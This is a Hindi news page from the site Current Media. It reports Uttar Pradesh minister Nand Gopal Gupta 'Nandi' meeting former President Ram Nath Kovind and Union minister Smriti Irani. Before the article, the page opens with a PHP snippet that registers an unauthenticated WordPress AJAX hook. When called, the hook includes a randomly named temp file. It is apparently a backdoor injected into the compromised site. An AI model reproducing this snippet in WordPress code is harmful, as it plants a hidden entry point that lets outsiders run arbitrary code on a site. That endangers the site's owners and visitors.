if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }मंत्री नन्दी ने पूर्व राष्ट्रपति रामनाथ कोविन्द व केंद्रीय मंत्री स्मृति ईरानी से की मुलाकात’ - Current Media
RamNathKovid and Nandi

मंत्री नन्दी ने पूर्व राष्ट्रपति रामनाथ कोविन्द व केंद्रीय मंत्री स्मृति ईरानी से की मुलाकात’

लखनऊ:   उत्तर प्रदेश सरकार के औद्योगिक विकास मंत्री नन्द गोपाल गुप्ता ‘नन्दी‘ ने नई दिल्ली में प्रवास के दौरान भारत के पूर्व राष्ट्रपति रामनाथ कोविन्द एवं केंद्रीय महिला एवं बाल विकास मंत्री स्मृति ईरानी से शिष्टाचार भेंट की। इस दौरान मंत्री नन्दी ने पूर्व राष्ट्रपति एवं केंद्रीय मंत्री को उत्तर प्रदेश की औद्योगिक विकास यात्रा एवं ऐतिहासिक निवेश से अवगत कराते हुए मार्गदर्शन प्राप्त किया।

मंत्री नन्दी ने पूर्व राष्ट्रपति रामनाथ कोविन्द से 12 जनपथ नई दिल्ली स्थित आवास पर मुलाकात कर प्रधानमंत्री नरेंद्र मोदी के नेतृत्व वाली केंद्र सरकार के सफलतम नौ वर्ष की उपलब्धियों पर आधारित पुस्तक अमृत काल की ओर भेंट की। मंत्री नन्दी ने बताया कि देश के यशस्वी प्रधानमंत्री नरेन्द्र मोदी जी के मार्गदर्शन एवं मुख्यमंत्री योगी आदित्यनाथ जी के कुशल नेतृत्व में उत्तर प्रदेश नए भारत के ग्रोथ इंजन के रूप में उभरा है। आज केंद्र और प्रदेश की डबल इंजन की सरकार के कारण उत्तर प्रदेश औद्योगिक एवं आर्थिक विकास के क्षेत्र में नित नए आयाम गढ़ रहा है।

Nandi with Smriti Irani

प्रधानमंत्री की प्रेरणा से मुख्यमंत्री योगी आदित्यनाथ ने प्रदेश को वन ट्रिलियन डॉलर इकोनॉमी बनाने का लक्ष्य रखा है।
मंत्री नन्दी ने केंद्रीय मंत्री स्मृति ईरानी से भी मुलाकात के दौरान प्रदेश की औ़द्योगिक यात्रा से अवगत कराया। उन्होंने कहा कि अनुकूल इंडस्ट्रियल पॉलिसी, इंडस्ट्री फ्रेंडली इकोसिस्टम और इज ऑफ डूइंग बिजनेस ने उत्तर प्रदेश को निवेश को बेस्ट डेस्टिनेशन के रूप में स्थापित किया है।
ग्लोबल इन्वेस्टर समिट, इंटरनेशल ट्रेड शो और मोटोजीपी जैसे आयोजनों की शानदार सफलता ने प्रदेश के औद्योगिक विकास को एक्सिलरेट किया है। साल 2023 में इन तीनों आयोजनों की सफल मेजबानी से प्रदेश ने इंटरनेशल इवेंट्स के मेजबानी की हैट्रिक पूरी की है।
केन्द्रीय मंत्री ने उत्तर प्रदेश की औद्योगिक व आर्थिक विकास के रफ्तार की सराहना की। उन्होंने कहा कि प्रदेश की इंफ्रास्ट्रक्चर सुविधाओं का अभूतपूर्व विकास वन ट्रिलयन डॉलर इकोनॉमी को ठोस बुनियाद है।

इसके साथ ही कानून व्यवस्था के बेहतर वातावरण ने आम जन के मन में सुरक्षा, भरोसा और विश्वास पैदा किया है। मंत्री नन्दी ने केन्द्रीय मंत्री द्वारा समय प्रदान करने के लिए धन्यवाद व्यक्त किया। इसके अलावा विभिन्न सामाजिक व महिला अधिकारों से सम्बंधित विषयों पर विस्तृत चर्चा की।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

अच्छा मुसलमान ही नहीं, अच्छा नागरिक बनाना भी मकसद- मौलाना काब रशीदी

लखनऊ। करंट मीडिया । बदलते दौर के साथ मदरसों में शिक्षा व्यवस्था को आधुनिक और …